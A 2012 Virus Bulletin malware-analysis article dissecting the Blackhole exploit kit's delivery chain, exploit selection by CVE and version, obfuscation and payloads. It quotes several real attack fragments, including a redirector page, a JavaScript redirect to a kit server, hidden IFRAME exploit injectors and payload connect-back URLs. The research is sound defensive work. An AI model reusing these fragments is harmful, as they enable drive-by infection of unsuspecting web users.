Part 2: Interaction with a black hole

2012-12-03

Gabor Szappanos

Sophos, Hungary
Editor: Helen Martin

Abstract

Gabor Szappanos started with two fairly incomplete sources of information about the latest Blackhole server version: the server-side source code from old versions and the outgoing flow of malware. He describes how, using these sources, he was able to sketch a reasonably good picture of what goes on inside the server hosting the Blackhole exploit kit.


Clearly, I should return my university diploma in Physics after coming up with a title like this. You cannot interact with a black hole by definition. The data flow is one-sided: everything goes in, nothing comes out – which hardly qualifies as an interaction. However, this is not the case with the Blackhole exploit kit, where information flows both in and out. Yet researching the latest Blackhole server version does remind me of examining a black hole: we have no information about what goes on inside, and we can only draw conclusions based on the effects it has on its surroundings. However, every analogy breaks at some point: we can observe the malware specimens that are coming out of Blackhole – there is a definite outward flow of information.

We can also take the knowledge gathered from analysing the old Blackhole server-side code, and see how useful it is when taking apart the attacks performed with this kit.

Essentially, we have two fairly incomplete sources of information: the outdated server-side source code and the outgoing flow of malware. From these two we can sketch a reasonably good picture of what is going on inside the server hosting the Blackhole exploit kit.

We will find that even though the code in question is quite a few versions behind the current code, the overall general operation hasn’t changed too much.

Attack in detail

The first part of this two-part series [1] ended with the deobfuscation of the server code, which was not complete, but sufficient for a general understanding of its operation. It proved to be possible to follow the chain of events both from the client side and the server side. The client-side events had already been documented in detail [2], while the server-side part was the missing piece that this article attempts to fill.

Data about the Blackhole attacks was gathered during a relatively long period from October 2011 until September 2012, which gave an insight into the moving parts and those that remained constant.

Typically, the initial vector of attack was spammed email messages. The email either came with an attached script that redirected to the Blackhole server or contained a direct link to the server – or, in its most simplistic form, the payload executable was sent out directly with the message.

Another known vector of Blackhole distribution was the injection of downloader code into websites. This method resulted in a very similar sequence of events, with only the initial vector differing.

Chain of events

Throughout the rest of the article I will refer to the most important server-side components as they are referred to in the configuration file (config.php). These are:

  • mainfile: As the first point of contact with the server, this PHP page receives the incoming requests from the targeted computers. Upon receiving a request, this page prepares (based on information gathered from the incoming request) a custom tailored downloader script that exploits the vulnerabilities identified on the target computer.

  • downloadfile: The individual exploits handed out by the mainfile connect back to this PHP page. Upon receiving a request, this page hands out the binary payload to the target computer.

A typical attack line consists of four distinct phases:

  1. Initial vector: The targeted host is provided with a carrier; this offers a hyperlink to initiate a chain of events that concludes in the Blackhole infection.

  2. Redirections: The initial vector from the previous stage is redirected through intermediate sites to make tracing the attack more complicated.

  3. mainfile: The hosting server is contacted and the server code collects and distributes the exploit functions for the targeted host.

  4. downloadfile: After any of the served exploits from the previous phase is activated, its downloader code connects back and the server code distributes the binary (Win32) executable payload.

A real example of the above scheme is shown in Figure 1.

Real-life example.

Figure 1. Real-life example.

Throughout the rest of the paper, I will not go into great depth on the working of the individual components if I feel that the particular component is already well documented [2].

Initial vector

All the fun starts with an official-seeming email, as illustrated in Figure 2.

Typical official-looking email message.

Figure 2. Typical official-looking email message.

It is interesting that in all of the identified email attacks the criminals used emails that looked like official notifications from an authority (e.g. BBB, IRS, UPS, Amazon, EFTPS), rather than the more basic instinct inspiring Viagra/‘naked teen girls’/‘Britney Spears exposed’ themes that are commonly observed in other malware distribution campaigns. The HTML messages contained a link that led to the next stage. In some rare cases the entire redirections stage was skipped, and the email itself contained a direct link or a JavaScript-obfuscated link to mainfile.

The other common intrusion vector for the Blackhole attacks was web infection: HTML or JS files on web servers were injected with downloader code. The infection reportedly occurred [5] using stolen FTP credentials to access the websites.

The JavaScript code in Figure 3 is stored in a byte array, in which the original values are modified by an encryption key. This key is generated from the seconds value of Date(2010,11,3,2,21,4). This is an interesting date, which keeps recurring in Blackhole components: it was used in the server code, and it keeps appearing in the web infection code as well.

Blackhole web infection component.

Figure 3. Blackhole web infection component.

Redirections

The redirections stage consisted of intermediate encrypted JavaScript files. Typically, there were a few dozen to a few hundred HTML pages to begin with. These are usually hacked legitimate websites; the URL is recognizable within a campaign. Most often it takes the form of hxxp://[legitimatedomain]/VHuzAprT/index.html, with a legitimate domain, a random directory and index.html. The other common scheme used hacked WordPress sites, with the HTML redirector page placed in one of the default directories – for example: hxxp://stoprocking.com/wp-content/themes/twentyten/palco.html. In the latter case the HTML filename is unique within a campaign, but changes between the distribution runs, and is a filename that looks normal, but is not such a commonly used name as index.html.

These HTML pages are simple, and without any obfuscation just link to the next step, the JavaScript part:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script language=”JavaScript” type=”text/JavaScript” src=”hxxp://www.grapevalleytours.com.au/ajaxam.js”></script>;
<script language=”JavaScript” type=”text/JavaScript” src=”hxxp://www.womenetcetera.com/ajaxam.js”></script>;
<script language=”JavaScript” type=”text/JavaScript” src=”hxxp://levillagesaintpaul.com/ccounter.js”></script>
<script language=”JavaScript” type=”text/JavaScript” src=”hxxp://fasttrialpayments.com/kquery.js”></script>
</html>

Typically, there are between three and five different JavaScript links, which all refer to the same, even more simplistic content.

document.location=’hxxp://downloaddatafast.serveftp.com/main.php?page=db3408bf080473cf’;

This stage is the most flexible part – sometimes the HTML part is missing, sometimes the JavaScript part, and rarely both of them (when the initial spammed email messages contain a direct link to the server).

At the end of the chain there is the mainfile link, which is the first encounter with the Blackhole hosting server. The link has an easy-to-recognize structure:

http://{server}/{mainfile}?{threadid}={random hex digits}

The above scheme was followed in all of the cases we observed.

{server} denotes the hosting server of the Blackhole kit, {mainfile} was the name of the main exploit dispatcher script, which returned the downloader script with the exploits. {threadid} was an identifier that was meant to identify distribution campaigns. Its value changed over time, while in the short-term may have persisted for a while when only the hosting server names changed daily. One particular thread ID, 73a07bcb51f4be71, was very enduring, appearing several times in the period between 31/01/2012 and 03/04/2012.

This thread ID was supposed to be the corner point of the Blackhole TDS functionality. It identified a set of possible configurations, distinguishing between the distribution campaigns. For each configuration set, different rules (regarding the distributed exploit) could be defined, determined by the value of the BrowserID, CountryID and OSID information gathered from the incoming request.

So in theory, Blackhole could serve custom tailored exploits for the attacked computers. In practice, however, the 1.0.2 configuration contained a single rule that served all distribution campaigns and OS/browser/country combinations. Despite the fact that a fully fledged TDS functionality was available, and that the particular code base was supposed to support 28 different server installations simultaneously, it was not utilized.

However, the situation has changed significantly in the latest identified installation. Mapping the actual state in September 2012 (version 1.2.5 of the kit), probing with different OS and browser versions, we observed a very granular TDS functionality, which is summarized in Table 1a and Table 1b.

Exploit deliveredVista: IE7, IE8 Win7: IE9, IE10Win7: Mozilla22, Opera12, Safari5 Android: Safari5Win7: Firefox14Vista: IE6Non-Windows platformsWinNT90: IE9Win8: Chrome17
Java (CVE-2010-0840, CVE-2012-0507)++++-++
XMLHTTP+ADODBSTREAM downloader (MS06-014)---+---
(CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188+ (IFRAME)+ (object)+ (object + IFRAME)+ (IFRAME)-+ (IFRAME)+ (object)
HCP (CVE-2010-1885) XMLHTTP+ADODB-------
Flash (CVE-2011-0611)----+++
Flash (CVE-2011-2110)+++++++
CVE-2012-1889-------

Table 1. Exploit distribution table in relation to OS/browser version info.

Exploit deliveredOSX: IE5 WinCE: IE4Win2K: Firefox5WinXP:IE9WinXP: Chrome17Win95: IE4 Win98: IE4, IE5, IE6 WinNT: IE5 WinNT351: IE5 WinNT40: IE5 Win2K: IE4, IE5, IE6Win2K3: IE7Win2K: IE8 WinXP: AOL96
Java (CVE-2010-0840, CVE-2012-0507)-++++++
XMLHTTP+ADODBSTREAM downloader (MS06-014)+---+--
(CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188-+ (object + IFRAME)+ (IFRAME)+ (object)+ (IFRAME)+ (IFRAME)+ (object)
HCP (CVE-2010-1885) XMLHTTP+ADODB--+ (link)+ (link)-+ (embed)+ (embed)
Flash (CVE-2011-0611)+++++++
Flash (CVE-2011-2110)+++++++
CVE-2012-1889-------

Table 2. Exploit distribution table in relation to OS/browser version info.

Mainfile

Upon receiving the incoming request, the ‘RedirectsSplit’ value in threaddata.php determines the type of reaction required. If it has some predefined value(s), it simply redirects the incoming request to the configured URL(s). If the value is not set, the exploit kit goes on to build the mainfile response, which will be a collection of functions, each of them exploiting a particular vulnerability.

Both the redirect and the attack response are logged in the MySQL database along with the IP address of the requesting victim.

The mainfile response is gathered from predefined building blocks. It consists of the JavaScript-enabled exploit functions, a general Java downloader that works without JavaScript support, and an end_redirect() finishing function. Finally, the returned script is encrypted.

The build logic is roughly the following:

insert = “end_redirect{};PluginDetect(){…};”
if exploit_1 is selected {
  insert += “exploit1() {exploit1_code; call exploit2()}”
}
else {
insert += “exploit1() { call exploit2()}”
}
if exploit_2 is selected {
  insert += “exploit2() {exploit2_code; call exploit3()}”
}
else {
insert += “exploit2() { call exploit3()}”
}
…
insert += “call end_redirect{}; call exploit1()”
write NO_JS_html + JS_crypt(insert)

The exploit functions in all 1.2.x kit versions are named spl0 through spl7. In the recently recorded attacks exploit function 0 was turned off, and exploit function 1 was absent from the building logic.

The infection script begins with the PluginDetect public library code [3], which is used to extract the relevant version information:

  • OS

  • Browser (and browser version)

  • Adobe Flash version

  • Adobe Reader version

  • Java version

This library is available for download, and in addition to the above list used by the Blackhole kit, other plug-ins are supported:

  • QuickTime

  • DevalVR

  • Shockwave

  • Windows Media Player

  • Silverlight

  • VLC Player

  • RealPlayer

The user-friendly download interface builds the script based on the specified settings regarding which of the plug-in versions should be included. It is not only Blackhole that has discovered this useful utility: the Bleeding Life exploit kit has used it, and recently the NeoSploit pack also added it [6] to its arsenal.

Blackhole has been using this library since at least version 1.0.2 – back then, it was only used in the PDF-related exploit function. Later versions, starting with 1.1.0, moved the library up front of the code, to enable it to be referenced globally by the other exploit functions as well.

The library code is inserted into the resulting script as a BASE64-encoded blob and unpacked on the fly when building the mainfile response page – which is an unusual practice. The most likely reason for this is that, this way, the author could avoid the pain of escaping all special characters in the PluginDetect code when using it as a string constant in the mainfile generation code. That would involve the error-prone process of going through about 10KB of script code, which would have to be repeated whenever the PluginDetect version or the included modules changed (which happened a couple of times over the lifetime of the Blackhole exploit kit [see Table 2]).

VersionRelease dateExploit functionsPluginDetect
2.009/2012-0.7.8 (AdobeReader)
1.2.530/07/2012spl0, spl2, spl3,spl4,spl5, spl6, spl7 spl0, spl2, spl4, spl5, spl7 blank0.7.8 (Java, Flash, AdobeReader)
1.2.411/07/2012spl0, spl2, spl3,spl4,spl5, spl6, spl7 spl0, spl2, spl7 blank, spl4 and spl5 sometimes blank0.7.8 (Java, Flash, AdobeReader)
1.2.328/03/2012spl0, spl2, spl3,spl4,spl5 spl4 blank, spl0 sometimes blank0.7.6 ( Flash, AdobeReader)
1.2.226/02/2012spl0, spl2, spl3,spl4,spl5 spl4 blank, spl0 blank0.7.6 ( Flash, AdobeReader)
1.2.109/12/2011spl0, spl1, spl2, spl3,spl4,spl5 spl4 blankNo version (Java, Flash, AdobeReader)
1.2.011/09/2011spl0, spl2, spl3,spl4,spl5, spl6,spl7 spl6 blankNo version (Java, Flash, AdobeReader)
1.0.220/11/2010ewvf, zazo,ai, dsfgsdfh, asgsafNo version (AdobeReader, used in the PDF handler)

Table 3. Mainfile characteristics in versions.

The individual exploit functions are organized in a function call chain. If a particular exploit is selected, then the appropriate function contains the exploit code, otherwise only the call to the next exploit function is present. During the construction of the script, all rules from threaddata.php are enumerated and matched against the information gathered from the incoming HTTP request. Filters can be defined by OS version, browser ID and country ID. For each defined rule a different set of exploit functions can be returned, thus implementing the TDS functionality.

Finally, an end_redirect function is called, which redirects the browser to an innocent page, with the usual ‘please wait…’ text. In some cases it additionally redirects to a Win32 executable.

At least the picture was this clear back with the 1.0.2 version. After the TDS functionality kicked in big time, and more granular system support was configured, the building logic got messy, most noticeably around the PDF exploit distribution, which in the 1.2.5 version already had three different forms.

The first form is applied when the browser is Internet Explorer. In this case, the exploiting PDF object is inserted as an IFRAME into the mainfile response script:

function show_pdf(src){var pifr=document.createElement(‘IFRAME’);pifr.setAttribute(‘width’,1);
pifr.setAttribute(‘height’,1);pifr.setAttribute(‘src’,src);document.body.appendChild(pifr)}

With some other browsers, such as Safari and Chrome, this form is changed to use an object element instead of an IFRAME:

function show_pdf(src){var p=document.createElement(‘object’);p.setAttribute(‘type’,’application/pdf’);
p.setAttribute(‘data’,src);p.setAttribute(‘width’,1);p.setAttribute(‘height’,1);document.body.appendChild(p)}

In the case of Firefox, both forms are included at the same time:

function show_pdf(src){var pifr=document.createElement(‘IFRAME’);pifr.setAttribute(‘width’,1);
pifr.setAttribute(‘height’,1);pifr.setAttribute(‘src’,src);document.body.appendChild(pifr)}

function show_pdf2(src){var p=document.createElement(‘object’);p.setAttribute(‘type’,’application/pdf’);
p.setAttribute(‘data’,src);p.setAttribute(‘width’,1);p.setAttribute(‘height’,1);document.body.appendChild(p)}

The HCP exploit (CVE-2010-1885) also has two forms, the first one embeds the script code directly, and the other inserts an IFRAME with a link to the PHP file on the server providing the content.

The exploit function assemblage changed with Blackhole kit releases. Table 2 summarizes the mainfile characteristics of Blackhole exploit kit versions, exploit function information and the usage of the PluginDetect library. This information may help to identify the version of the underlying exploit kit in a given attack.

It is worth noting that the call order of the exploit functions, their names, and in most cases the statically inserted function bodies are all hard-coded in the Blackhole server backend code, thus cannot be changed easily. Indeed, there were only minor changes (resulting from the addition of new exploits to the kit) in the generated code, even the names of the exploit functions remained the same throughout versions 1.2.x.

There are two possible ways in which an exploit function is excluded from the mainfile script: the exploit function is missing completely, or it is a blank function, calling only the next one in the chain. The first can only be achieved by a new exploit kit release; the latter is possible via admin user interface clicks.

Each exploit function contains a connect-back URL that will be used to download and execute the Win32 binary content from the server. The URL has the following form:

http://{server}/{downloadfile}?f=73a07?e=1

Here, parameter f is the payload identifier, e is the exploit identifier.

(An interesting fact is that the PHP file serving the HCP vulnerability (CVE-2010-1885) connect-back URL reverses the order of the f and e parameters. It has no effect on the operation of the code, but is a remarkable deviation from the general pattern.)

As of version 1.2.5, the URL scheme for some of the attack vectors changed to serve multiple payloads instead of a single payload. The shellcode delivered by the Flash exploit can contain a list of file references, matching the above URL, but with a different file ID for each, as in the following example:

hxxp://spicyplaces.com/l/r.php?f=9235d&e=1
hxxp://spicyplaces.com/l/r.php?f=c5826&e=1
hxxp://spicyplaces.com/l/r.php?f=182b5&e=1

The variation of the HCP exploiting script with the code embedded into the mainfile response script can accept multiple parameters in the form: hxxp://spicyplaces.com/l/data/hcp_vbs.php?f=9235d::c5826::182b5&d=0::0::0. Both the file ID and the exploit ID can now serve multiple values. The variation that inserts only a link to the mainfile code also serves multiple payloads but in the old-fashioned way, serving them sequentially, one by one. This change was introduced in version 1.2.4, and only applied to the HCP function.

Table 3 identifies the mapping between the exploit ID (the e query parameter) and the delivered exploit content in the sample gathered at the beginning of the inspection period, the most recent field samples, and the original 1.0.2 code. (It was not possible to positively identify all cases, as samples were not always available, hence the question marks in the table.)

Exploit ID1.2.0 (2011.11)1.2.5 (2012/09)Server code (v.1.0.2)
0Java (CVE-2010-4452)Java (CVE-2010-0840,CVE-2012-0507)XMLHTTP+ADODB (MS06-014)
1-SWF (CVE-2011-0611)JAR (CVE-2010-0886)
2JAR (CVE-2010-0886)XMLHTTP+ADODB (MS06-014)CVE-2010-1885 + XMLHTTP+ADODB
3Java (?)PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659)PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659)
4XMLHTTP+ADODB (MS06-014)PDF (CVE-2010-0188)PDF (CVE-2010-0188)
5HCP (CVE-2010-1885)HCP (CVE-2010-1885)CVE-2010-0806
6PDF (?)?Java (CVE-2010-0840,CVE-2012-0507)
7-CVE-2012-1889-
8SWF (CVE-2011-0611)--

Table 4. Exploit ID to exploit mappings.

Downloadfile

This stage of the attack is reached when the connect-back code from the activated exploit reaches back to the server, issuing a request with a specific format:

http://{server}/{downloadfile}?f=73a07?e=1

In the above URL the downloadfile variable is determined in config.php. The most common values we observed were d.php, w.php and q.php.

The parameter f is the unique ID in the SQL database: this identifies which file from the data directory should be returned. The returned payload is dependent only on the value of f, regardless of the value of parameter e. Normally, we would expect that as the attacks are updated with new executables (which change frequently to avoid detection by anti-virus software), this value would increase on the same site. This was indeed observed in the first couple of attacks, although they were hosted on different servers. This implies that the database was likely dumped and imported when transferring the backend. Later, a huge change was observed, from file ID 97 to ea498. From then on, file IDs were five-digit hexadecimal numbers that were reused within attacks. As an example, 182b5 was seen from 05/06/2012 until 10/09/2012.

The parameter e identifies the exploit that was completed in the download. It is stored in the database along with the IP address of the infected host. This information is later used for tracking the exploit statistics.

If for any reason the e parameter is missing, a default value (4 in the case of 1.0.2) is taken, which belongs to a PDF (CVE-2010-0188) exploit. And as we look at the mainfile code, we can see that when constructing the PDF exploit code corresponding to the value 4, the e parameter tag is not appended to the end of the connect-back URL, which makes this default assignment logical.

Upon receiving this request, the server code builds a response. That response will include an executable payload inserted as application/x-msdownload content type, the content of which is determined by the f parameter of the request.

The filename of the download is randomly selected from the list: 'readme', 'info', 'contacts', 'about' and 'calc' to make the download appear less suspicious. The extension is always '.exe'.

Individual exploits

The author of the exploit kit has been busy over the past two years keeping his creation up to date. As new popular exploit code has become available, he has added it to the code base and eventually removed old and not so useful vulnerabilities.

Table 4a and Table 4b summarize the exploit content of each of the exploit functions for all contemporary Blackhole versions.

In the following sections we describe the individual exploit functions deployed by Blackhole. Only the latest samples were analysed in more detail, older versions can be tracked from Table 4a and Table 4b. If data for a particular exploit is missing, it is because I couldn’t find it in any of the analysed samples belonging to the particular version of the exploit kit.

Exploit function1.1.01.2.01.2.11.2.2
spl0Java (CVE-2010-0840)Java (CVE-2010-4452)Java (CVE-2010-4452)N/A
spl1Java (CVE-2010-4452)N/AExpJava (CVE-2010-0840)N/A
spl2Java (CVE-2010-0886)Java (CVE-2010-0886) - (new.avi -> exe download)XMLHTTP + ADODBSTREAM downloader(MS06-014) XMLHTTP + ADODBSTREAM downloader (MS06-014)
spl3Java (CVE-2010-3552)Java (CVE-2010-3552)PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188
spl4N/AXMLHTTP+ADODB (MS06-014)N/AN/A
spl5PDF (CVE-2010-0188)PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324) or CVE-2010-0188Flash (CVE-2011-0611)Flash (CVE-2011-0611)
spl6HCP (CVE-2010-1885)N/AN/AN/A
spl7N/AN/AN/AN/A
NOJSN/AJava (CVE-2010-0840, CVE-2012-0507)N/AJava (CVE-2010-0840, CVE-2012-0507)

Table 5. Exploit delivery in different versions of the Blackhole kit.

Exploit function1.2.31.2.41.2.5
spl0Java (CVE-2010-4452)N/AN/A
spl1N/AN/AN/A
spl2XMLHTTP + ADODBSTREAM downloader (MS06-014)N/AXMLHTTP + ADODBSTREAM downloader (MS06-014)
spl3PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188PDF (CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2007-5659) or CVE-2010-0188
spl4N/AHCP (CVE-2010-1885) XMLHTTP+ADODBHCP (CVE-2010-1885) XMLHTTP+ADODB
spl5Flash (CVE-2011-0611)Flash (CVE-2011-0611)Flash (CVE-2011-0611)
spl6N/AFlash (CVE-2011-2110)Flash (CVE-2011-2110)
spl7N/AN/ACVE-2012-1889
NOJSJava (CVE-2010-0840, CVE-2012-0507)Java (CVE-2010-0840, CVE-2012-0507)Java (CVE-2010-0840, CVE-2012-0507)

Table 6. Exploit delivery in different versions of the Blackhole kit.

spl0: empty

This exploit function used to deliver Java exploits (CVE-2010-0840 or CVE-2010-4452) in early versions, but since version 1.2.4 it has not been used.

spl1: missing

This exploit function delivered the same Java exploits as spl0, though not the same ones at the same time. From version 1.2.2 onwards it has been completely absent from the scripts – not even an empty skeleton was left in the call chain.

spl2: MDAC exploit MS06-014

This exploit function used a version of the classic VBScript downloader method that was very popular among script downloaders some 10 years ago. The only improvement over those old-timers is the access to the shell object, which instead of the CreateObject method makes use of some exploitable ActiveX objects.

The XMLHTTP object is utilized to download the file and the ADODB.Stream to save it to a local file. Then the exploited object is used to run the saved executable, as shown in Figure 4.

MS06-014 downloader.

Figure 4. MS06-014 downloader.

spl3: PDF

This exploit function delivers the PDF exploits. The PluginDetect library is used to determine the version of the AdobeReader plug-in, and depending on the version, one of two possible PDF file generator PHP functions is called: the first for PDF versions below the main version 8, and the second for all 8.x PDF versions, and for all 9.x versions where x<=3. The decision logic is shown in Figure 5.

PDF delivery decision logic.

Figure 5. PDF delivery decision logic.

The show_pdf() function appends an additional HTML child element that contains the link to the PDF generator server-side PHP script. This appended element can either be an IFRAME or an object, depending on the OS and browser version (see Table 1a and Table 1b).

The first PDF is a compound in itself, serving four different exploits. Depending on the Adobe Reader version, the following exploit codes are delivered [2]:

  • All major versions 9 and for major version 8 until 8.12: CVE-2008-2992 (Collab.getIcon)

  • All major versions 6 and for major version 7 before 7.11: CVE-2007-5659 (Collab.collectEmailInfo)

  • Version 7.1: CVE-2008-2992 (util.printf)

  • Versions between 8.12 and 8.2 (boundaries not included): CVE-2009-4324 (media.newPlayer).

The second PDF delivers only one exploit, CVE-2010-0188 (libtiff). The obfuscation of both of the PDF types is the same; it is sufficient to examine only one of them, which will be CVE-2010-0188.

The main script code is stored as data and distributed along the various PDF fields (Author, Subject, Keyword, Creator, Producer), with the hex-encoded shellcode being separate in the Title field.

Encrypted main script is stored in PDF fields.

Figure 6. Encrypted main script is stored in PDF fields.

The encoded main body is decoded by a simple decode script stored in the PDF which results in a script that uses the common heap-spray technique and builds the shellcode from the content of the Title field of the PDF.

Heap spray and shellcode builder.

Figure 7. Heap spray and shellcode builder.

(To view a larger version of Figure 7 click here.)

The shellcode itself is nothing special; it is the usual boring downloader code that we have seen in web attacks many times over. The Windows API names are looked up by the usual ror 0x0d encoded checksums.

The traditional shellcode.

Figure 8. The traditional shellcode.

This shellcode is the same in all exploit functions, the only difference is that while in most cases it is XORed with 0x28 and the code starts with a short decryptor, in the cases of the PDF libtiff exploit and the HCP exploit, the XOR layer is missing from the top of the shellcode.

spl4: Windows Help and Support Center Vulnerability

This exploit function delivers the exploit for vulnerability CVE-2010-1885. It is used in two forms. In some cases the script is only linked into the mainfile script, in other cases the downloader script is actually embedded into it. Which is actually selected depends on the OS and browser version (see Table 1a and Table 1b).

Directly embedded downloader code.

Figure 9. Directly embedded downloader code.

In either case, the downloader code is the classical XMLHTTP+ADODB downloader, which does not need to use the MDAC exploit.

Decoded downloader code.

Figure 10. Decoded downloader code.

pl5: Flash CVE-2011-0611

This exploit function delivers the CVE-2011-0611 Adobe Flash vulnerability in multiple stages, using two SWF files. The components are shown in Figure 11.

The mainfile fragment of the SWF attack.

Figure 11. The mainfile fragment of the SWF attack.

The stage 1 component allocates and fills large enough memory buffers in order to make the preparations for the second stage.

This SWF file (field.swf) utilizes the ExternalInterface class of the ActionScript language that allows the code running in the SWF file to communicate with the embedding container – which in this case is the mainfile script. The communication in this case consists of calling the getAllocSize, getBlockSize, etc. functions, then getCN, which loads the second stage SWF.

ExternalInterface function calls in stage 1 SWF.

Figure 12. ExternalInterface function calls in stage 1 SWF.

(To view a larger version of Figure 12 click here.)

The second stage file (score.swf) drops an SWF file that calls getShellCode() to get the shellcode. This shellcode is then invoked by the conditions set by the heap spray.

Calling getShellCode from the second SWF component.

Figure 13. Calling getShellCode from the second SWF component.

spl6: Flash CVE-2011-2110

This exploit code has recently been added (from v. 1.2.4) to the Blackhole menu. The function embeds an SWF file as an object into the mainfile response page.

Spl6 in the mainfile script.

Figure 14. Spl6 in the mainfile script.

(To view a larger version of Figure 14 click here.)

The loaded SWF file has an ActionScript downloader script which will connect back to download the binary payload.

The decompiled ActionScript code.

Figure 15. The decompiled ActionScript code.

(To view a larger version of Figure 15 click here.)

spl7: XML Core Services – CVE-2012-1889

This exploit function is interesting in that it sheds some light on the development practice of an exploit author. The exploit was apparently used in targeted attacks as early as March 2012. At least some live samples popped up using it on the popular website analysis tool, jsunpack.jeek.org. The first public appearance of the code was on 24 May on Chinese website baidu.com. From this point, events unfolded rapidly. Microsoft published an advisory on 12 June. Four days later, support for the vulnerability was added to the Metasploit framework. At around the same time, the Blackhole author was interviewed and confirmed that support for the vulnerability would be added to Blackhole soon. Finally, on 22 June, version 1.2.5 was released including this exploit.

Timeline of CVE-2012-1889.

Figure 16. Timeline of CVE-2012-1889.

The timeline of this particular exploit suggests that the support was added in haste. Looking at the result, one can see immediately that this code is a distinct block in the server code: the coding style is not integrated into the general style of the mainfile script. Not even the indentation conforms to the standards (i.e. no indentation, no unnecessary whitespaces) of the mainfile script.

CVE-2012-1889 code in Blackhole.

Figure 17. CVE-2012-1889 code in Blackhole.

(To view a larger version of Figure 17 click here.)

If we compare the added code with the most authentic source we know of – that published in May on baidu.com – it is easy to see that the code was copy-pasted into Blackhole. The function order, the variable names, the indentation, the constants – in short, everything is an exact copy of that code.

The genuine CVE-2012-1889 code from China.

Figure 18. The genuine CVE-2012-1889 code from China.

The major difference is the shellcode, which is the standard used in all other exploit functions, this time not XOR encrypted.

Evidently, support for this exploit was added to the kit in a hurry – more as a PR move to prove that the author could react quickly, than as a real improvement. In fact, the author must have been convinced of the rather limited use of his enhancement, because in the field only a handful of cases were observed in which this exploit was turned on. In the vast majority of the cases this exploit function remained empty.

NOJS: Java – CVE-2010-0840

This part of the mainfile response page works without JavaScript support. It loads a Java archive, which receives the encrypted URL as a parameter. The encryption is a simple replacement cypher, using a randomly swapped alphabet string as the replacement key.

URL obfuscation in Java downloader.

Figure 19. URL obfuscation in Java downloader.

The Java downloaders use different levels of obfuscation. In the simplest cases the strings are only reversed, broken up into smaller chunks, or encrypted.

Simple string obfuscations in Blackhole Java components.

Figure 20. Simple string obfuscations in Blackhole Java components.

(To view a larger version of Figure 20 click here.)

There were also more complex cases when the obfuscation was solved with the Zelix KlassMaster professional Java protection tool [4].

Zelix KlassMaster (ZKM) is an efficient tool that makes analysis very complicated, hiding the string constants from the decompilation output. It is worth noting that the version of ZKM was 5.4.3 in all of the observed Blackhole-related files. The author didn’t care to upgrade to the currently available 5.5.0 version.

The usage of ZKM is not exclusive – in other class files the code is left readable, only the string constants are obfuscated with simple methods.

Why Java?

When I started the analysis of the Blackhole server-side code, I had a couple of questions in mind (needless to say, the number of questions multiplied with each day). The very first question came when I looked at the exploit distribution statistics available from a few Blackhole back-ends. All had the same characteristics that are shown in Figure 21: an overwhelming dominance of Java exploitations.

Exploit deliverance stats.

Figure 21. Exploit deliverance stats.

In each of them, Java exploits proved to be the most effective infection vectors – always by a large margin. I had a couple of ideas as to the possible reason for this phenomenon:

  • The mainfile logic is skewed and favours Java over the other vulnerabilities – it serves the others only if Java distribution fails.

  • The mainfile is bogus, and if some exploit function crashes, the rest will not have a chance to activate – whereas the NOJS Java component always executes.

  • The downloadfile logic does not count subsequent download attempts after the first one (which is usually the NOJS Java that does not need time-consuming decryption) hits the server.

After evaluating the code, it turned out that none of my hypotheses were true. The Blackhole exploit kit doesn’t favour any of the individual exploit functions. At this point, running out of ideas, I had to follow the advice of Sir Arthur Conan Doyle's detective Sherlock Holmes: ‘Once you eliminate the impossible, whatever remains, no matter how improbable, must be the truth.’

So after eliminating the above hypotheses, I was left with the following, however ridiculous it sounds: the Java security fixes are not installed on the end-users’ computers. Users don’t consider Java to be an immediate threat, and consequently don’t rush to update their systems. And that is the biggest security challenge regarding web threats. We need to make users aware that, right now, Java is the weakest spot – and it is heavily under attack.

Version 2.0

This research was about to finish when a new major version of Blackhole (2.0) was released. This paper will not cover that version in detail, however it deserves at least a brief mention.

The most important new features of this version are [7] (as claimed by the author):

  • Direct download of executable payloads is prevented.

  • Exploit contents are only loaded when the client is considered vulnerable.

  • Use of the PluginDetect library in Java versioning has been dropped (reducing the necessary code size significantly).

  • Some old exploits have been removed (leaving Java atomic and byte, PDF LibTIFF, MDAC).

  • The predictable URL structure has been changed (filenames and querystring parameter names).

  • Machine stats have been updated to include Windows 8 and mobile devices.

  • A better breakdown of plug-in version information is provided.

  • The checking of the referrer has been improved.

  • TOR traffic is blocked.

  • A self-learning mode is available for blacklisting (outside of distribution campaigns, all downloads could be considered from security researchers, thus blacklisted).

The URL structure of versions 1.x was indeed very predictable, allowing URL-filtering products to block infection attempts easily. This has been changed, the query parameter names are now random, and the values are obfuscated.

The mainfile response script starts with the attenuated PluginDetect code, which contains only the Adobe Reader versioning.

That is followed by the individual exploit functions – and there are not many of them left, only PDF and MS06-014 were observed, with the additional NOJS Java downloader.

The exploit functions are not chained one after the other, instead they follow each other in separate try{} constructs.

Blackhole v2.0 code.

Figure 22. Blackhole v2.0 code.

(To view a larger version of Figure 22 click here.)

Payloads

At some point, usually around the end of an analysis, we have to ask ourselves: what for? What is the likely objective of the Blackhole distribution campaigns? It can be best understood by inspecting the downloaded executable payloads, because from the point of view of the infection process, that component is the final destination.

The chart in Figure 23 breaks down the payloads observed over a two-month period (August and September 2012) into major categories.

Payload breakdown.

Figure 23. Payload breakdown.

It clearly shows the motivation of the purchasers of Blackhole: financial gain. The largest chunk of the distributed payload samples either collect money directly (FakeAV, Ransomware), steal information to gain money (ZBot, password stealers), or take part in click fraud (ZeroAccess). The rest are backdoors and downloaders that facilitate the attacks.

The sole purpose of Blackhole operators is to make money – which shouldn’t come as a surprise. Nevertheless, the above chart explains the large number of ongoing complaints about fake AV and ransomware infections. Nothing personal, it’s just about the money.

twitter.png
fb.png
linkedin.png
hackernews.png
reddit.png

 

Latest articles:

